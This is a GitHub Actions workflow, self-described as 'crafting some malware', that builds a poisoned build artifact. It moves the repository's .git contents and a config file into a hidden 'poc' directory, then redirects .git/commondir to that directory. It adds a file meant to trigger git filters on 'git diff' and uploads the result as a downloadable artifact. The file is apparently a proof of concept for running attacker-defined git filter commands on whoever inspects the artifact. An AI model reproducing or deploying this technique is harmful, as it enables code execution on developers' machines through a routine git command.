name: Crafting some malware here

on: [push]

jobs:
  build_and_test:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v2
      - run: rm -rf .github README.md
      - run: cp -r .git poc
      - run: mv config poc/config
      - run: rm -rf .git/*
      - run: echo "./poc" > .git/commondir
      - run: mv poc .git/poc
      # some new file to trigger git filters (git diff)
      - run: echo "newfile" > newfile
      - name: Archive production artifacts
        uses: actions/upload-artifact@v2
        with:
          name: artifacts
          path: ./
